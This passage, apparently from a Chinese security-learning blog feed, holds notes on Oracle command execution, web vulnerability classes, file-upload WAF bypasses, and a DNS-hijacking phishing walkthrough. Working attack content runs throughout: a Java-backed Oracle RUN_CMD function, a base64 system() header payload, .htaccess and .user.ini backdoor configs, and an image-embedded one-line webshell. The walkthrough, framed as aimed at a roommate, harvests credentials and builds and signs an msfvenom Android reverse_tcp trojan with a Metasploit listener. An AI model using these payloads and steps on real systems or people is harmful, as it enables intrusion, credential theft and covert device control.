class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs java">create or replace<br>function <span class="hljs-title function_">RUN_CMD</span><span class="hljs-params">(p_cmd in varchar2)</span> <span class="hljs-keyword">return</span> number<br>as<br>language java<br>name <span class="hljs-string">'Util.RunThis(java.lang.String) return integer'</span>;<br>/<br>create or replace procedure <span class="hljs-title function_">RC</span><span class="hljs-params">(p_cmd in varchar2)</span><br>as<br>x number;<br>begin<br>x := run_cmd(p_cmd);<br>end;<br>/<br>variable x number;<br>set serveroutput on<br>exec dbms_java.set_output(<span class="hljs-number">100000</span>);<br>grant javasyspriv to CMS<br>/<br></code></pre></td></tr></table></figure><p>3.连接Oracle数据库</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">connect</span> CMS<span class="hljs-operator">/</span>NSFCMS@(description<span class="hljs-operator">=</span>(address_list<span class="hljs-operator">=</span>(address<span class="hljs-operator">=</span>(protocol<span class="hljs-operator">=</span>tcp)(host<span class="hljs-operator">=</span>主机地址)(port<span class="hljs-operator">=</span>端口)))(connect_data<span class="hljs-operator">=</span>(SERVICE_NAME<span class="hljs-operator">=</span>ORACLE)));<br></code></pre></td></tr></table></figure><p>4.调用自定义函数执行命令</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">exec</span> : x :<span class="hljs-operator">=</span> RUN_CMD(<span class="hljs-string">'要执行的命令'</span>);<br></code></pre></td></tr></table></figure><p>注意这里的命令不能通过webshell执行,而是要通过数据库管理工具(例如SQLplus)执行,所以建议在可以远程连接服务器时使用这种方法。</p><h2 id="OracleShell工具提权"><a href="#OracleShell工具提权" class="headerlink" title="OracleShell工具提权"></a>OracleShell工具提权</h2><p>除此之外,我们也可以采用自动化工具OracleShell提权Oracle数据库,前提条件也是获取到dba的最高权限权限,并且需要知道SID,通常与账号密码在一起。<br>可以使用sqlmap检测是否为dbs权限,返回true则为dba权限:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap 数据库类型://用户名:密码@URL/数据库名 --is-dba<br></code></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/16/mIaPk8zxe56J1gn.png"></p><p>后面直接用工具连接即可。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>权限提升</tag>
</tags>
</entry>
<entry>
<title>Web漏洞综合</title>
<link href="/2021/10/13/Web%E6%BC%8F%E6%B4%9E%E7%BB%BC%E5%90%88/"/>
<url>/2021/10/13/Web%E6%BC%8F%E6%B4%9E%E7%BB%BC%E5%90%88/</url>
<content type="html"><![CDATA[<p>前段时间学业繁忙,没有时间整理笔记。正好中秋放假,我就在这里把上周所学的知识归纳总结一下。由于笔记中提到的几种攻击方法如今在红队实战中很少用到,所以对于以下方法只需了解即可,但是安服岗的面试中时常会问到这些。</p><h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2><p>XSS,即“跨站脚本攻击”(Cross Site Scripting),为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击。</p><p>XSS分为以下三种类型:存储型,反射型和DOM型。</p><p>存储型XSS:存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie 反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。 DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Object Model,DOM)的一种漏洞,DOM-XSS是通过url传入参数去控制触发的,其实也属于反射型XSS。</p><h2 id="命令执行(RCE)"><a href="#命令执行(RCE)" class="headerlink" title="命令执行(RCE)"></a>命令执行(RCE)</h2><p>命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。</p><p>如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有<code>system( )</code>、<code>exec( )</code>、<code>shell_exec( )</code>、<code>passthru( )</code>、<code>pcntl_execl( )</code>、<code>popen( )</code>、<code>proc_open( )</code>等。当攻击者可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。PHP执行命令是继承WebServer用户的权限,这个用户一般都有权限向Web目录写文件,可见该漏洞的危害性相当大。</p><p>例如案例中的webug靶场,就是当PHP版本为5.2.17或5.4.45时存在命令执行漏洞。我们只需要在登录页面抓包,在http请求头中加入<code>Accept-Encoding:gzip,deflate</code>和<code>Accept-Charset:c3lzdGVtKCdscycpOw== //这里c3lzdGVtKCdscycpOw==是system('ls');的base64编码</code>,即可在响应包中看到相应的结果。或者当网站框架是thinkPHP时,可以利用exp实施攻击。</p><h2 id="逻辑漏洞"><a href="#逻辑漏洞" class="headerlink" title="逻辑漏洞"></a>逻辑漏洞</h2><p>权限类有以下三种:</p><p>1.水平越权:普通用户/管理员能访问其他普通用户/管理员才能够访问的系统信息或者系统功能。</p><p>2.垂直越权:普通用户能够访问管理员甚至超级管理员才能够访问的系统信息或者系统功能。</p><p>3.未授权访问:游客能够访问普通用户甚至超级管理员才能访问的系统信息或者系统功能。</p><p>其它的有支付金额修改、整数溢出、密码找回、验证码爆破等,这里就不再细说了。</p><h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2><p>CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(<a href="https://link.jianshu.com/?t=http://baike.baidu.com/view/50325.htm">XSS</a>),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与<a href="https://link.jianshu.com/?t=http://baike.baidu.com/view/50325.htm">XSS</a>攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比<a href="https://link.jianshu.com/?t=http://baike.baidu.com/view/50325.htm">XSS</a>更具危险性。</p><p>由于实战中条件较为苛刻(cookie未失效且知道相应参数),故现在很少使用。具体实施方法是:在本地编写一个伪造的页面,页面后端传递的参数和目标站点的相同,通过社工的方法引诱管理员点击相应按钮提交已经赋值的参数来新建一个管理员用户,再结合提权等手段拿到webshell。</p><h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><p>SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。</p><p>很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地服务器。</p><p>服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。大部分的web服务器架构中,web服务器自身都可以访问互联网和服务器所在的内网。</p><p><strong>那SSRF可以做什么呢?</strong></p><ul><li>可以对外网服务器所在的内网、本地进行端口扫描,获取一些服务的banner信息 。</li><li>攻击运行在内网或者本地的应用程序。</li><li>对内网web应用进行指纹识别,通过访问默认文件实现 。<br>攻击内外网的web应用。sql注入、strut2、redis等。<br>利用file协议读取本地文件等。</li></ul><h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><p>序列化和反序列化存在于Java和PHP中,一般使用exp进行攻击,或者构造恶意的类。很多中间件都存在反序列化漏洞,例如fastjson、strut2、shiro、weblogic等。关于其中的原理,我将在以后的Java安全部分仔细探究。</p><h2 id="常问面试题"><a href="#常问面试题" class="headerlink" title="常问面试题"></a>常问面试题</h2><p>1.SSRF过滤了127.0.0.1,怎么绕过?</p><blockquote><p>localhost</p><p>十六进制编码</p><p>@(例如<a href="http://example.com@127.0.0.1/">http://example.com@127.0.0.1</a> )</p><p>短链接</p><p>句号代替点</p><p>DNS解析</p><p>各种协议(gopher、sftp、gopher等等)</p></blockquote><p>2.PHP 代码执行的危险函数和PHP 命令执行函数有哪些? </p><blockquote><p>PHP 代码执行的危险函数:</p></blockquote><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func</span>()、 <br><br><span class="hljs-title function_ invoke__">call_user_func_array</span>()、<span class="hljs-title function_ invoke__">create_function</span>()、 <br><br><span class="hljs-title function_ invoke__">array_map</span>() <br></code></pre></td></tr></table></figure><blockquote><p>PHP 命令执行函数:</p></blockquote><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span>()、<span class="hljs-title function_ invoke__">shell_exec</span>()、 <br><br><span class="hljs-title function_ invoke__">passthru</span>()、<span class="hljs-title function_ invoke__">exec</span>()、<span class="hljs-title function_ invoke__">popen</span>()、<span class="hljs-title function_ invoke__">proc_open</span>()、<span class="hljs-title function_ invoke__">putenv</span>()<br></code></pre></td></tr></table></figure><p>3.fastjson漏洞原理</p><blockquote><p>在请求包里面中发送恶意的json格式payload,漏洞在处理json对象的时候,没有对@type字段进行过滤,从而导致攻击者可以传入恶意的TemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes生成java实例,这就达到fastjson通过字段传入一个类,再通过这个类被生成时执行构造函数。</p></blockquote><p> 4.shiro反序列化漏洞原理?怎么发现?</p><blockquote><p>shiro反序列化主要是Apache shiro提供了一个remember的一个功能,用户登录成功后会生成经过加密并编码的cookie,保存在浏览器中方便用户的日常使用,而服务器对cookie的处理流程就是先获取浏览器上保存的cookie,然后将其bs64解码,再进行AES解密,再将其反序列化进行校验,而漏洞就是出现在这里,我们都知道AES它是一个硬编码,他是有默认密钥的,如果程序员没有去修改或者过于简单,那我们就可以进行cookie重构,先构造我们的恶意代码,然后将恶意代码进行序列化,然后AES加密(密钥我们已经爆破出来了),再进行bs64编码,形成我们新的cookie,而服务器在处理时就会按照刚才的处理流程,就会在服务端触发我们构造的恶意代码。</p><p>登陆失败时候会返回rememberMe=deleteMe字段或者使用shiroScan被动扫描去发现。</p></blockquote><p>5.shiro不出网怎么利用?</p><blockquote><p>1.定位Web目录写入文件</p><p>2.构造回显</p><p>3.内存马</p><p>4.时间延迟获取Web路径写入webshell</p></blockquote><p>6.XSS,CSRF,SSRF三种漏洞的区别</p><blockquote><p>XSS:XSS是服务器对用户输入的数据没有进行足够的过滤,导致客户端浏览器在渲染服务器返回的html页面时,出现了预期值之外的 脚本语句被执行。</p><p>CSRF: CSRF是服务器端没有对用户提交的数据进行随机值校验,且对http请求包内的refer字段校验不严,导致攻击者可以 利用用户的Cookie信息伪造用户请求发送至服务器。 </p><p>SSRF:SSRF是服务器对 用户提供的可控URL过于信任,没有对攻击者提供的URL进行地址限制和足够的检测,导致攻击者可以以此为跳板攻击内网或其他服务器</p></blockquote><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Web安全top10漏洞的学习就告一段落了,下周将进行提权部分的学习,敬请期待!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
</entry>
<entry>
<title>Kali渗透(一)--DNS域名劫持与钓鱼</title>
<link href="/2021/10/10/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-DNS%E5%9F%9F%E5%90%8D%E5%8A%AB%E6%8C%81%E4%B8%8E%E9%92%93%E9%B1%BC/"/>
<url>/2021/10/10/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-DNS%E5%9F%9F%E5%90%8D%E5%8A%AB%E6%8C%81%E4%B8%8E%E9%92%93%E9%B1%BC/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近被室友熬夜打游戏搞得有些破防,正好最近在学习Kali Linux的使用,于是便想到了这一招。</p><p>下面我将演示如何借助 Kali Linux 系统内置的一款基于ARP地址欺骗的网络嗅探工具ettercap,对局域网内的 Win7 主机进行 DNS 域名劫持,从而使得受害主机访问任意网站的域名时跳转到 Kali 攻击机指定的恶意网页,<strong>实现网络钓鱼攻击</strong>。本实验为内网渗透,非公网IP上线。 不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏。</p><p><strong>环境</strong></p><table><thead><tr><th>主机</th><th>角色</th><th>IP地址</th></tr></thead><tbody><tr><td>Kali Linux 2021.3</td><td>攻击者</td><td>192.168.149.128</td></tr><tr><td>Windows 7</td><td>受害者</td><td>192.168.149.129</td></tr><tr><td>Windows 10</td><td>受害者</td><td>192.168.149.130</td></tr><tr><td>(可以是远程服务器,也可以是kali攻击机)</td><td>钓鱼服务器</td><td>xxx.xxx.xxx.xxx</td></tr></tbody></table><p><strong>DNS劫持</strong></p><p>1.什么是DNS(域名)劫持</p><p>DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。</p><p>2.DNS劫持的后果</p><p>大规模的DNS劫持,其结果往往是断网,因为大网站的访问量实在太大了,钓鱼网站的服务器可能会扛不住大流量的访问,瞬间就会瘫痪掉,网民看到的结果就是网页打不开。网上购物、网上支付等敏感站点有可能会被恶意指向钓鱼网站,使得个人账户密码存在泄露的风险。</p><p>3.本文域名劫持原理</p><p>此次攻击的原理基于局域网内的ARP欺骗,ARP攻击就是通过伪造 IP 地址和 Mac 地址实现 ARP 欺骗,能够在网络中产生大量的 ARP 通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机 ARP 缓存中的IP-MAC 条目,造成网络中断或中间人攻击。</p><blockquote><p>本文的攻击本质就是使用Ettercap借助 ARP 欺骗攻击使得 Win 7 受害者主机误将攻击者主机 Kali 的 IP 当作网关 IP,然后 Kali 攻击机又将受害者访问的域名进一步指向了自己指定的 IP 地址,实现网络钓鱼攻击。</p></blockquote><h2 id="演示"><a href="#演示" class="headerlink" title="演示"></a>演示</h2><p>1.编辑ettercap的dns文件,在文件末尾添加下图红框内的两条解析(注意把IP地址改为钓鱼网站的),把受害者访问的所有网站都解析到钓鱼网站的IP地址上。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">vim <span class="hljs-regexp">/etc/</span>ettercap/etter.dns<br></code></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/16/kj7B4mic13GfrwL.png" alt="img"></p><p>2.启动ettercap:</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">ettercap -G</span><br></code></pre></td></tr></table></figure><p>3.在vmware的“编辑-虚拟网络编辑器”中查看nat模式对应虚拟网卡(vmnet8)的默认网关,并在物理机的“网络连接”中设置vmnet8为下图所示(网段可能不同,根据实际情况更改):</p><p><img src="https://s2.loli.net/2022/09/16/4cMTNzHh7yIfGt9.png" alt="img"></p><p>4.配置ettercap网卡:</p><p><img src="https://s2.loli.net/2022/09/16/mSjogFGTvLWezHE.png" alt="img"></p><p>5.扫描局域网内存活主机:</p><p><img src="https://s2.loli.net/2022/09/16/QZ4DFVLHocUqj7B.png" alt="img"></p><p>6.选择网关并add to target 1,再选择目标并add to target 2:</p><p><img src="https://s2.loli.net/2022/09/16/1ldhztbjAuovQpe.png" alt="img"></p><p>7.选择ARP攻击,并勾选第一项:</p><p><img src="https://s2.loli.net/2022/09/16/Xq1FNS3Ghuy8Qpn.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/16/QBT71kWYEfSLgt4.png" alt="img"></p><p>8.开启攻击后我们打开插件双击dns_spoof进行DNS毒化操作:</p><p><img src="https://s2.loli.net/2022/09/16/vkJhz8FcGlxmdrb.png" alt="img"></p><p>9.点击开始按钮即可开始攻击:</p><p><img src="https://s2.loli.net/2022/09/16/XEn8r19ZFjCzhfv.png" alt="img"></p><p>10.受害者访问任意网页,都会被强制跳转到提前搭建好的钓鱼网站:</p><p><img src="https://s2.loli.net/2022/09/16/53rse4VSxRLu1Un.png" alt="img"></p><p>搭配后端PHP代码连接数据库,可以获得受害者的校园网账号和密码。不过,我们的目的是诱导受害者下载木马并使其上线。这里我们要用到msf来生成安卓木马:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">msfvenom -p android<span class="hljs-regexp">/meterpreter/</span>reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > <span class="hljs-regexp">/放置的目录/</span>文件名.apk<br></code></pre></td></tr></table></figure><p>因为现在很多手机都不会安装未签名的apk文件,所以我们可以用Android Killer对木马的图标、名字进行修改和签名。当然,也可以使用命令:</p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">生成授权签名<br>keytool -genkey -v -keystore apk-trojan-key.keystore -alias aliasname -keyalg RSA -keysize <span class="hljs-number">1024</span> -validity <span class="hljs-number">999</span><br><br><span class="hljs-keyword">jarsigner </span>-verbose -sigalg <span class="hljs-keyword">SHA1withRSA </span>-<span class="hljs-keyword">digestalg </span><span class="hljs-keyword">SHA1 </span>-keystore apk-trojan-key.keystore 文件名.apk aliasname<br><br>验证签名<br><span class="hljs-keyword">jarsigner </span>-verify 文件名.apk<br></code></pre></td></tr></table></figure><p>11.msf设置监听:</p><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gams">msfconsole<br>use exploit/multi/handler<br><span class="hljs-keyword">set</span> payload <span class="hljs-comment">android</span>/meterpreter/<span class="hljs-comment">reverse_tcp</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">LHOST 192.168.149.128</span> //<span class="hljs-comment">kali</span>本机的<span class="hljs-comment">ip</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">LPORT 9055</span> //监听上线的端口 需要与生成木马的时候填写一样<br>exploit //执行监听<br></code></pre></td></tr></table></figure><p>当目标上线之后,我们就可以停止ARP攻击了。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>安卓木马的功能不仅仅只有这么一些,剩下的东西也是需要大家自己去摸索的。本次教程到此结束,最后还是要提醒大家不要做出违法的事情,谢谢!</p>]]></content>
<categories>
<category>无线安全</category>
</categories>
<tags>
<tag>kali渗透</tag>
</tags>
</entry>
<entry>
<title>文件上传(三)--WAF绕过思路</title>
<link href="/2021/10/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%89%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/"/>
<url>/2021/10/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%89%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/</url>
<content type="html"><![CDATA[<p>这里我以著名的<code>upload-labs</code>文件上传靶场作为演示,图片因为博客搬迁丢失了qwq。</p><p>注意:由于WAF产品会不停更新换代,拦截手法也一再升级,所以这里介绍的方法可能会过时,请各位师傅灵活运用!这里的绕过手法只适用于黑名单,白名单只能配合文件包含或者iis7.5的解析漏洞!</p><h2 id="常用思路"><a href="#常用思路" class="headerlink" title="常用思路"></a>常用思路</h2><p>1.文件名后缀大小写绕过</p><p>2.文件名后缀双写绕过</p><p>3.命名规范绕过:尝试使用(正反)斜杠、星号、冒号(冒号会将文件内容置空)、问号、|、<>绕过</p><h2 id="骚姿势"><a href="#骚姿势" class="headerlink" title="骚姿势"></a>骚姿势</h2><p>1.http请求头中的<code>Content-Disposition</code>字段后面填充垃圾字符串</p><p>2.http请求头中的<code>filename</code>字段:</p><ul><li>加多个等于号</li><li>后缀名换行</li><li>单双引号替换</li><li>多个字段</li><li><code><</code>或<code>;</code>代替<code>.</code></li><li>在后缀名后面加上三个<code><<<</code></li><li>删除一个引号</li><li>引号替换为`或者在引号前添加`</li><li>00截断</li></ul><p>3.分块传输</p><p>4.非路径截断</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">1</span>.php;jpg<br><span class="hljs-attribute">1</span>.php%<span class="hljs-number">00</span>.jpg<br><span class="hljs-attribute">1</span>.php/<span class="hljs-number">00</span>.jpg<br></code></pre></td></tr></table></figure><p>实战中一般在本地搭建环境,安装上目标机器的waf,然后使用burpsuite或者自己编写的Python脚本进行模糊测试,判断过滤掉的字符有哪些。除了文件上传的绕过以外,还要注意webshell的免杀和流量的检测。</p><p>暂时只能想到这么多了,如果师傅们有更好的思路,可以在评论区留言,谢谢!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>模糊测试</tag>
<tag>文件上传</tag>
</tags>
</entry>
<entry>
<title>文件上传(二)--Apache和Nginx</title>
<link href="/2021/10/07/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%BA%8C%EF%BC%89-Apache%E5%92%8CNginx/"/>
<url>/2021/10/07/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%BA%8C%EF%BC%89-Apache%E5%92%8CNginx/</url>
<content type="html"><![CDATA[<p>下面我们来总结另外几个与中间件以及http请求头有关文件上传的漏洞,它们都与客户机或服务器的操作系统无关。</p><h2 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h2><h3 id="文件名解析漏洞"><a href="#文件名解析漏洞" class="headerlink" title="文件名解析漏洞"></a>文件名解析漏洞</h3><p>由于Apache解析文件后缀名的顺序是从右往左,所以我们可以在文件名最后加上Apache无法识别的文件后缀名来绕过。例如我们要上传一个PHP木马,那我们可以把文件名命名为”*.php.123”,其中”123”是Apache无法识别的后缀名,则Apache会解析左边的”php”后缀名,从而实现绕过。</p><h3 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h3><p>Apache中的.htaccess文件是用户用来自定义管理目录的,我们可以新建一个”.htaccess”文件,并在里面写入自定义的内容,例如:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs htaccess"><FilesMatch "test"><br> SetHandler<br> application/x-httpd-php<br></FilesMatch><br></code></pre></td></tr></table></figure><p>这样Apache会把文件名中含有”test”的文件当作PHP文件执行。利用这个特性,我们可以把图片马以这样的方式让Apache解析。</p><h3 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h3><h3 id="文件名解析漏洞-1"><a href="#文件名解析漏洞-1" class="headerlink" title="文件名解析漏洞"></a>文件名解析漏洞</h3><p>大多数网站都使用白名单机制限制上传文件类型,但是我们可以在上传文件的路径后面加上”*.php”,例如<code>https://www.example.com/upload/1.png/2.php</code>。当Nginx解析到URL中的”2.php”时,由于我们并没有真正上传这个文件,Nginx会向上级目录查找,即把我们实际上传的”1.png”当作PHP文件解析。这里”1.png”实际上是修改了后缀名的大马或小马。</p><h2 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h2><h3 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h3><p>和上面Apache的<code>.htaccess</code>配置文件类似,<code>.user.ini</code>是用户自定义的PHP配置文件,我们可以利用这个文件来构造后门和隐藏后门。</p><p>PHP 配置项中有两个配置可以起到一些作用:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">auto_prepend_file = <filename> <span class="hljs-comment">//包含在文件头</span><br>auto_append_file = <filename> <span class="hljs-comment">//包含在文件尾</span><br></code></pre></td></tr></table></figure><p>这两个配置项的作用相当于一个文件包含,比如:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">// .user.ini</span><br>auto_prepend_file = <span class="hljs-number">1</span>.jpg<br><span class="hljs-comment">// 1.jpg</span><br><span class="hljs-meta"><?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?></span><br><span class="hljs-comment">// 1.php(任意php文件)</span><br></code></pre></td></tr></table></figure><p>满足这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require(‘1.png’),进行了文件包含。</p><p>另一条配置包含在文件尾,如果遇到了 exit 语句的话就会失效。</p><p>.user.ini使用范围很广,不仅限于 Apache 服务器,同样适用于 Nginx 服务器,只要服务器启用了 fastcgi 模式 (通常非线程安全模式使用的就是 fastcgi 模式)。</p><p><strong>但它同时也存在局限。</strong>在.user.ini中使用这条配置也说了是在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php 文件。但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。</p><h3 id="base64解码"><a href="#base64解码" class="headerlink" title="base64解码"></a>base64解码</h3><p>在PHP的<code>base64_decode</code>中,会只对合法字符合并后解码,非法字符则直接丢弃,不参与整体的base64解码。合法字符包含以下64个字符:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">A</span>-Za-z0-<span class="hljs-number">9</span>/+<br></code></pre></td></tr></table></figure><p>等于号是占位符,不是编码范围内的字符。利用PHP的这种特性,我们可以编写图片马,在正常的图片中插入base64编码后的一句话木马:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">PD89YCRfR0VUWzFdYDs7Pz4C<br><span class="hljs-comment">//base64_decode后得到:</span><br><span class="hljs-meta"><?=</span>`<span class="hljs-variable">$_GET</span>[<span class="hljs-number">1</span>]`;;<span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>使用方式:<code>URL?1=phpinfo()</code></p><h3 id="MIME类型检测"><a href="#MIME类型检测" class="headerlink" title="MIME类型检测"></a>MIME类型检测</h3><p>服务器通过对http请求头里的”content-type”字段进行检验,来判断文件类型是否符合要求。常见的符合要求的文件名有:image/jpeg,image/gif,image/png等。要利用这个漏洞,我们需要把http请求头中的”content-type”字段改为上面几种符合要求的MIME即可。不过要注意要在文件头加上”GIF89a”来绕过可能的文件头校验。</p><p><strong>那如果遇到白名单检测呢?这时候就要配合文件包含和%00截断漏洞了。在以后的笔记中,我将会总结WAF绕过的一些技巧。</strong></p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>文件上传</tag>
</tags>
</entry>
<entry>
<title>文件上传(一)--IIS</title>
<link href="/2021/10/06/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%80%EF%BC%89-IIS/"/>
<url>/2021/10/06/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%80%EF%BC%89-IIS/</url>
<content type="html"><![CDATA[<h2 id="形成原因"><a href="#形成原因" class="headerlink" title="形成原因"></a>形成原因</h2><p>文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。 这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞的利用无限扩大。大多数的上传漏洞被利用后攻击者都会留下WebShell以方便后续进入系统。</p><p>什么是WebShell?WebShell是黑客经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的WebShell编写语言为asp(aspx)、jsp和php。</p><h2 id="IIS文件上传漏洞"><a href="#IIS文件上传漏洞" class="headerlink" title="IIS文件上传漏洞"></a>IIS文件上传漏洞</h2><h3 id="目录解析漏洞"><a href="#目录解析漏洞" class="headerlink" 